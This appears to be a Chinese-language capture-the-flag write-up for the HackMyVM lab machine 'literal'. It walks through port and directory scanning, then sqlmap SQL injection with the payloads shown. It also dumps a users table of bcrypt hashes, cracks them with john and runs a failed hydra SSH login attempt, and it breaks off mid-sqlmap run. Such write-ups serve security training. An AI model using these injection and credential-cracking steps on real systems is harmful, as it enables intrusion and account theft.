![\"image-20250608233900599\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201732.png\")
<\/div><\/p>\n![\"image-20250608231514781\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201734.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we're dating.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.107:22\nOpen 192.168.10.107:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 3072 30:ca:55:94:68:33:8b:50:42:f4:c2:b5:13:99:66:fe (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHo8DOQOkmGeRiMEbdmfaE+IyUTZlYHdLzXeFISi7bsWEPHm2f3Lx9RpCBM4g05tmpBBe4sPyruVbuslcGcCmlUzBYupaHJQRVi79Dezh9CKf4Ui1EC6y4jh9TbvHPvM7hPhSBhADnCuEpWlVHeyUs4Wwzt6149l4ZFYXnl1\/jfG\/LA\/PNRX26fhZUEJJXuvhwJIbchRxXhF00mREtmx5hbyDAXOIImUReCSjEhUAR3I4eljBgNEf\/SoBvntnricNXGb8y2M1WoidBz3lLRRPhpQy0GE2BVs\/05EirzRAIVWhLj7OiKIoLRd\/tKq\/CvSy5AYPyaC55cwktS60KIMzUBldGK65btKjNabs9rgNE\/azTmpmEiWuHZKCdW4IhA00hXywbr6lWuSNmEaPnQqBLT0VUKFHEyhApBmvcT5GjHS34lG88xGAy7V1TVW8JKPHDq1ttnnJknRn9C9BmgylrwyL7m8UjCn49unSIbIFtkaSshPhpZfLzxxXKS6xrBes=\n| 256 2d:b0:5e:6b:96:bd:0b:e3:14:fb:e0:d0:58:84:50:85 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNvQ4n2nkgCsY7Z8qPbOt54NyXbow2ioVHPFXTn6XuwDOJpc5Q0FhEmSTVC4o4l9G+FMDzkJ2JgghkHvNstXiXU=\n| 256 92:d9:2a:5d:6f:58:db:85:56:d6:0c:99:68:b8:59:64 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKUnTxK9t2cdkLjqE75NTSfr7qidWHqt0\/uV3i0UALED\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.41\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/blog.literal.hmv\nMAC Address: 08:00:27:4C:64:E1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: blog.literal.hmv; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff0c\u6dfb\u52a0\u5230\/etc\/hosts<\/code>\uff1a<\/p>\n192.168.10.107 blog.literal.hmv<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ gobuster dir -u http:\/\/blog.literal.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip -e 200,302,301 -t 20 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/blog.literal.hmv\/\n[+] Method: GET\n[+] Threads: 20\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: txt,html,zip,php\n[+] Expanded: true\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/blog.literal.hmv\/.html (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/.php (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/images (Status: 301) [Size: 321] [--> http:\/\/blog.literal.hmv\/images\/]\nhttp:\/\/blog.literal.hmv\/index.html (Status: 200) [Size: 3325]\nhttp:\/\/blog.literal.hmv\/login.php (Status: 200) [Size: 1893]\nhttp:\/\/blog.literal.hmv\/register.php (Status: 200) [Size: 2159]\nhttp:\/\/blog.literal.hmv\/logout.php (Status: 302) [Size: 0] [--> login.php]\nhttp:\/\/blog.literal.hmv\/config.php (Status: 200) [Size: 0]\nhttp:\/\/blog.literal.hmv\/fonts (Status: 301) [Size: 320] [--> http:\/\/blog.literal.hmv\/fonts\/]\nhttp:\/\/blog.literal.hmv\/dashboard.php (Status: 302) [Size: 0] [--> login.php]\nhttp:\/\/blog.literal.hmv\/.html (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/.php (Status: 403) [Size: 281]\nhttp:\/\/blog.literal.hmv\/server-status (Status: 403) [Size: 281]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20250608232520132\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5c1d\u8bd5login.php<\/code>\u4ee5\u53caregister.php<\/code>\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u7528\u6237\u5e76\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u767b\u5f55\u4ee5\u540e\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\nsql\u6ce8\u5165<\/h3>\n
\u770b\u8d77\u6765\u662f\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u5c1d\u8bd5\u662f\u5426\u5b58\u5728SQL\u6ce8\u5165<\/code>\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\u8bbf\u95ee\u901f\u9012\u6781\u6162\u4e14\u5361\u987f\uff0c\u5c1d\u8bd5\u547d\u4ee4\u884c\u8fdb\u884c\u67e5\u8be2\uff1a<\/p>\nPHPSESSID=1q4tie68cpa1mue9af2ao65549<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884csqlmap<\/code>\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/blog.literal.hmv\/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch --dbs\n ___\n __H__\n ___ ___[.]_____ ___ ___ {1.9.2#stable}\n|_ -| . [,] | .'| . |\n|___|_ [)]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:04:49 \/2025-06-08\/\n\n[12:04:49] [INFO] resuming back-end DBMS 'mysql' \n[12:04:49] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: sentence-query (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: sentence-query=1' AND (SELECT 3428 FROM (SELECT(SLEEP(5)))hFKD) AND 'mdnY'='mdnY\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 5 columns\n Payload: sentence-query=1' UNION ALL SELECT NULL,CONCAT(0x717a6b7871,0x4b756f5a616d456b4c76596f48446652644149766b6d64745666776148746858744863505247566e,0x716b626a71),NULL,NULL,NULL-- -\n---\n[12:04:49] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)\nweb application technology: Apache 2.4.41\nback-end DBMS: MySQL >= 5.0.12\n[12:04:49] [INFO] fetching database names\navailable databases [4]:\n[*] blog\n[*] information_schema\n[*] mysql\n[*] performance_schema\n\n[12:04:50] [INFO] fetched data logged to text files under '\/home\/kali\/.local\/share\/sqlmap\/output\/blog.literal.hmv'\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/blog.literal.hmv\/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog --tables\n-----\nDatabase: blog\n[2 tables]\n+----------+\n| projects |\n| users |\n+----------+\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/blog.literal.hmv\/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog -T users --dump\n\nDatabase: blog\nTable: users\n[18 entries]\n+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+\n| userid | username | useremail | userpassword | usercreatedate |\n+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+\n| 1 | test | test@blog.literal.htb | $2y$10$wWhvCz1pGsKm..jh\/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |\n| 2 | admin | admin@blog.literal.htb | $2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K | 2023-04-07 17:21:47 |\n| 3 | carlos | carlos@blog.literal.htb | $2y$10$ikI1dN\/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD\/.p.bh0w.bJBW | 2023-04-07 17:21:48 |\n| 4 | freddy123 | freddy123@zeeli.moc | $2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK | 2023-04-07 17:21:48 |\n| 5 | jorg3_M | jorg3_M@zeeli.moc | $2y$10$lZ.\/Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG | 2023-04-07 17:21:48 |\n| 6 | aNdr3s1to | aNdr3s1to@puertonacional.ply | $2y$10$F2Eh43xkXR\/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi\/OBA6hm | 2023-04-07 17:21:48 |\n| 7 | kitty | kitty@estadodelarte.moc | $2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW | 2023-04-07 17:21:48 |\n| 8 | walter | walter@forumtesting.literal.hmv | $2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO | 2023-04-07 17:21:48 |\n| 9 | estefy | estefy@caselogic.moc | $2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa | 2023-04-07 17:21:48 |\n| 10 | michael | michael@without.you | $2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km | 2023-04-07 17:21:48 |\n| 11 | r1ch4rd | r1ch4rd@forumtesting.literal.hmv | $2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO | 2023-04-07 17:21:48 |\n| 12 | fel1x | fel1x@without.you | $2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m | 2023-04-07 17:21:48 |\n| 13 | kelsey | kelsey@without.you | $2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6. | 2023-04-07 17:21:48 |\n| 14 | jtx | jtx@tiempoaltiempo.hy | $2y$10$jN5dt8syJ5cVrlpotOXibeNC\/jvW0bn3z6FetbVU\/CeFtKwhdhslC | 2023-04-07 17:21:48 |\n| 15 | DRphil | DRphil@alcaldia-tol.gob | $2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC | 2023-04-07 17:21:48 |\n| 16 | carm3N | carm3N@estadodelarte.moc | $2y$10$D7uF6dKbRfv8U\/M\/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo\/.RnW | 2023-04-07 17:21:48 |\n| 17 | lanz | lanz@literal.htb | $2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So\/8IWLi4e69QqJrM8FZvAMf..e | 2023-04-07 17:55:36 |\n| 18 | kali | kali@kali.com | $2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1. | 2025-06-08 15:40:11 |\n+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+<\/code><\/pre>\n<\/div><\/p>\n\u8fd9\u91cc\u51c6\u5907\u7834\u8bd1\uff0c\u76f4\u63a5\u4e22\u7ed9ai\u8ba9\u4ed6\u5206\u79bb\u518d\u7ed9\u6211\u4eec\u5c31\u884c\u4e86\u3002\u3002\u3002\u3002\uff08\u9ad8\u7aef\u7684\u53a8\u5e08\u5f80\u5f80\u91c7\u7528\u6700\u6734\u7d20\u7684\u70f9\u996a\u65b9\u5f0f\uff09<\/p>\n
test:$2y$10$wWhvCz1pGsKm..jh\/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma\nadmin:$2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K\ncarols:$2y$10$ikI1dN\/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD\/.p.bh0w.bJBW\nfreddy123:$2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK\njorg3_M:$2y$10$lZ.\/Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG\naNdr3s1to:$2y$10$F2Eh43xkXR\/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi\/OBA6hm\nkitty:$2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW\nwalter:$2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO\nestefy:$2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa\nmichael:$2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km\nr1ch4rd:$2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO\nfel1x:$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m\nkelsey:$2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6.\njtx:$2y$10$jN5dt8syJ5cVrlpotOXibeNC\/jvW0bn3z6FetbVU\/CeFtKwhdhslC\nDRphil:$2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC\ncarm3N:$2y$10$D7uF6dKbRfv8U\/M\/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo\/.RnW\nlanz:$2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So\/8IWLi4e69QqJrM8FZvAMf..e\nkali:$2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1.<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32\/64 X3])\nCost 1 (iteration count) is 1024 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\n123456789 (freddy123) \nbutterfly (estefy) \nmonica (r1ch4rd) \nhellokitty (kitty) \n50cent (DRphil) \nslipknot (jorg3_M) \nmichael1 (michael) \n147258369 (fel1x) \nkelsey (kelsey) \n741852963 (walter)\nzxcvbnm,.\/ (jtx) <\/code><\/pre>\n\u8bb0\u5f55\u4e00\u4e0b\u5bc6\u7801\uff0c\u5e76\u5c1d\u8bd5\u8fdb\u884cssh\u8fde\u63a5\u3002\u8fd9\u91cc\u7528 AI \u7f16\u5199\u4e86\u4e00\u4e2a\u811a\u672c\u5c1d\u8bd5\u8fdb\u884c\u6838\u5bf9\uff1a<\/p>\n
# user\nfreddy123\nestefy\nr1ch4rd\nkitty\nDRphil\njorg3_M\nmichael\nfel1x\nkelsey\nwalter\njtx<\/code><\/pre>\n# pass\n123456789\nbutterfly\nmonica\nhellokitty\n50cent\nslipknot\nmichael1\n147258369\nkelsey\n741852963\nzxcvbnm,.\/<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u4f46\u662f\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ paste -d: user pass > cred\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ hydra -C cred ssh:\/\/192.168.10.107:22 -t 4 -vV -f \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-08 12:42:58\n[DATA] max 4 tasks per 1 server, overall 4 tasks, 11 login tries, ~3 tries per task\n[DATA] attacking ssh:\/\/192.168.10.107:22\/\n[VERBOSE] Resolving addresses ... [VERBOSE] resolving done\n[INFO] Testing if password authentication is supported by ssh:\/\/freddy123@192.168.10.107:22\n[INFO] Successful, password authentication is supported by ssh:\/\/192.168.10.107:22\n[ATTEMPT] target 192.168.10.107 - login "freddy123" - pass "123456789" - 1 of 11 [child 0] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "estefy" - pass "butterfly" - 2 of 11 [child 1] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "r1ch4rd" - pass "monica" - 3 of 11 [child 2] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "kitty" - pass "hellokitty" - 4 of 11 [child 3] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "DRphil" - pass "50cent" - 5 of 11 [child 0] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "jorg3_M" - pass "slipknot" - 6 of 11 [child 1] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "michael" - pass "michael1" - 7 of 11 [child 3] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "fel1x" - pass "147258369" - 8 of 11 [child 2] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "kelsey" - pass "kelsey" - 9 of 11 [child 3] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "walter" - pass "741852963" - 10 of 11 [child 1] (0\/0)\n[ATTEMPT] target 192.168.10.107 - login "jtx" - pass "zxcvbnm,.\/" - 11 of 11 [child 0] (0\/0)\n[STATUS] attack finished for 192.168.10.107 (waiting for children to complete tests)\n1 of 1 target completed, 0 valid password found\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\n[ERROR] 1 target did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-08 12:43:07<\/code><\/pre>\n\u65b0\u6ce8\u5165\u70b9<\/h3>\n
\u6ce8\u610f\u5230\u524d\u9762\u7684\u90ae\u7bb1\u4e2d\u51fa\u73b0\u4e86\u4e00\u4e2a\u65b0\u7684dns\u89e3\u6790\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
192.168.10.107 forumtesting.literal.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u8bbf\u95ee\uff0c\u53d1\u73b0\u4f1a\u81ea\u52a8\u8fdb\u884c\u8df3\u8f6c\uff1a<\/p>\n
http:\/\/forumtesting.literal.hmv\/category.php<\/code><\/pre>\n\u53cd\u9988\u592a\u6162\uff0c\u603b\u662f\u5361\u6b7b\uff0c\u5c1d\u8bd5\u7ec8\u7aef\u8fdb\u884c\u6d4b\u8bd5\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ curl http:\/\/forumtesting.literal.hmv\/category.php\n<!DOCTYPE html>\n<html>\n<head>\n<meta http-equiv="Content-Type" content="text\/html; charset=utf-8" \/>\n<link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css">\n<link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap-theme.min.css">\n<script src="https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js"><\/script>\n<script src="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/js\/bootstrap.min.js"><\/script>\n<!-- jQuery -->\n<title>c4TLoUis forum<\/title> \n<link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css">\n<script src="https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js"><\/script>\n<script src="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/js\/bootstrap.min.js"><\/script>\n<link rel="stylesheet" href="css\/style.css">\n<\/head>\n<body class="">\n<div class="container" style="min-height:500px;">\n <div class="container">\n <div class="row">\n <h2>Discussion Forum | About... Imagination<\/h2>\n <h3><a href="category.php">Home<\/a> | <a href="login.php">Login<\/a> | <a href="cp_login.php">Control Panel<\/a><\/h3>\n\n <div class="single category">\n <ul class="list-unstyled">\n <li><span style="font-size:25px;font-weight:bold;">Categories<\/span> <span class="pull-right"><span style="font-size:20px;font-weight:bold;">Topics \/ Posts<\/span><\/span><\/li>\n <li><a href="category.php?category_id=2" title="">Forum details <span class="pull-right">0 \/ 0<\/span><\/a><\/li>\n <li><a href="category.php?category_id=1" title="">New things for the blog <span class="pull-right">0 \/ 0<\/span><\/a><\/li>\n <\/ul>\n <\/div>\n <\/div>\n<\/div>\n<div class="insert-post-ads1" style="margin-top:20px;">\n\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ curl http:\/\/forumtesting.literal.hmv\/category.php | html2text\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 1816 100 1816 0 0 24319 0 --:--:-- --:--:-- --:--:-- 24540\n***** Discussion Forum | About... Imagination *****\n**** Home | Login | Control Panel ****\n * Categories Topics \/ Posts\n * Forum details 0 \/ 0\n * New things for the blog 0 \/ 0\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ curl -s http:\/\/forumtesting.literal.hmv\/category.php | html2text\n***** Discussion Forum | About... Imagination *****\n**** Home | Login | Control Panel ****\n * Categories Topics \/ Posts\n * Forum details 0 \/ 0\n * New things for the blog 0 \/ 0<\/code><\/pre>\n\u53d1\u73b0\u51fa\u73b0\u4e86\u53ef\u80fd\u5b58\u5728sql\u6ce8\u5165\u7684\u70b9\uff1acategory.php?category_id=2<\/code>\uff0c\u8fdb\u884csqlmap\u6d4b\u8bd5\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal]\n\u2514\u2500$ sqlmap -u "http:\/\/forumtesting.literal.hmv\/category.php?category_id=2" --batch --dbs \n ___\n __H__\n ___ ___[']_____ ___ ___ {1.9.2#stable}\n|_ -| . ['] | .'| . |\n|___|_ ["]_|_|_|__,| _|\n |_|V... |_| https:\/\/sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 12:55:58 \/2025-06-08\/\n\n[12:55:58] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=82oqekh0oed...3bdp26e439'). Do you want to use those [Y\/n] Y\n[12:55:58] [INFO] testing if the target URL content is stable\n[12:55:58] [INFO] target URL content is stable\n[12:55:58] [INFO] testing if GET parameter 'category_id' is dynamic\n[12:55:58] [INFO] GET parameter 'category_id' appears to be dynamic\n[12:55:58] [WARNING] heuristic (basic) test shows that GET parameter 'category_id' might not be injectable\n[12:55:58] [INFO] testing for SQL injection on GET parameter 'category_id'\n[12:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[12:55:59] [WARNING] reflective value(s) found and filtering out\n[12:55:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\n[12:55:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'\n[12:55:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'\n[12:55:59] [INFO] testing 'Microsoft SQL Server\/Sybase AND error-based - WHERE or HAVING clause (IN)'\n[12:55:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'\n[12:55:59] [INFO] testing 'Generic inline queries'\n[12:55:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'\n[12:55:59] [INFO] testing 'Microsoft SQL Server\/Sybase stacked queries (comment)'\n[12:55:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'\n[12:55:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[12:56:19] [INFO] GET parameter 'category_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable \nit looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y\/n] Y\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y\/n] Y\n[12:56:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[12:56:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[12:56:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[12:56:19] [INFO] target URL appears to have 1 column in query\ndo you want to (re)try to find proper UNION column types with fuzzy test? [y\/N] N\n[12:56:19] [WARNING] if UNION based SQL injection is not detected, please consider and\/or try to force the back-end DBMS (e.g. '--dbms=mysql') \n[12:56:19] [INFO] target URL appears to be UNION injectable with 1 columns\n[12:56:19] [INFO] checking if the injection point on GET parameter 'category_id' is a false positive\nGET parameter 'category_id' is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N\nsqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:\n---\nParameter: category_id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)\n---\n[12:56:59] [INFO] the back-end DBMS is MySQL\n[12:56:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \nweb server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)\nweb application technology: Apache 2.4.41, PHP\nback-end DBMS: MySQL >= 5.0.12\n[12:57:00] [INFO] fetching database names\n[12:57:00] [INFO] fetching number of databases\n[12:57:00] [INFO] retrieved: \ndo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y\/n] Y\n[12:57:30] [INFO] adjusting time delay to 1 second due to good response times\n3\n[12:57:30] [INFO] retrieved: in^C\n[12:57:45] [WARNING] HTTP error codes detected during run:\n500 (Internal Server Error) - 72 